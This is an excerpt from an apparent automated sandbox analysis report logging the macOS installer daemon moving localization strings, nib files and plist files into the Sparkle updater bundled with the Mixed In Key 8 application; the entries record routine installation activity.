              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/uk.lproj/.BC.T_8wKpRD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/uk.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/.BC.T_4aR1tb -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/es.lproj/.BC.T_ob1IZY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/es.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/is.lproj/.BC.T_XJHggp -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/is.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sl.lproj/.BC.T_PUnJ3o -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sl.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/.BC.T_oEmgh6 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/da.lproj/.BC.T_4DWGNQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/da.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/it.lproj/.BC.T_Ux5MrL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/it.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sk.lproj/.BC.T_4wZrSc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sk.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/.BC.T_4oMg03 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sv.lproj/.BC.T_keapaL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sv.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cs.lproj/.BC.T_T7NYg9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cs.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ko.lproj/.BC.T_PYxk3z -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ko.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/no.lproj/.BC.T_oLozTU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/no.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/hu.lproj/.BC.T_redHxP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/hu.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/tr.lproj/.BC.T_EKPXlZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/tr.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pl.lproj/.BC.T_BJnDYQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pl.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/.BC.T_WeMYaJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ru.lproj/.BC.T_WY1GYG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ru.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cy.lproj/.BC.T_KHuGtH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cy.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/.BC.T_wBEWmN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/SUStatus.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fr.lproj/.BC.T_8tvzcu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fr.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fi.lproj/.BC.T_HSeika -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fi.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/id.lproj/.BC.T_k078C3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/id.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nl.lproj/.BC.T_wmLgko -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nl.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/th.lproj/.BC.T_gVnCVM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/th.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ro.lproj/.BC.T_V7fzdj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ro.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ca.lproj/.BC.T_7lnhIu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ca.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/.BC.T_EZy30A -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/Sparkle.icnsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/.BC.T_0YLrar -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/.BC.T_mM7FNG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/PkgInfoJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_1gNBcF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/Sparkle.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_xs4Msz -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUAutomaticUpdateAlert.nibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_WGtX9q -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdatePermissionPrompt.nibJump to behavior
